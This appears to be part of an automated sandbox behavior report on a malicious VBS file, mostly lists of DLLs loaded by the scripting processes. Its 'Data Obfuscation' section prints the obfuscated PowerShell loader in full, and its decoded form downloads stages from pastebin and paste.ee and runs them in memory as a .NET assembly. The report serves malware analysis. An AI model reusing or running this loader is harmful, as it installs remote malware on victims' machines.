                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: asegurar.vbsStatic file information: File size 15016182 > 1048576

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;$global:?
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));"
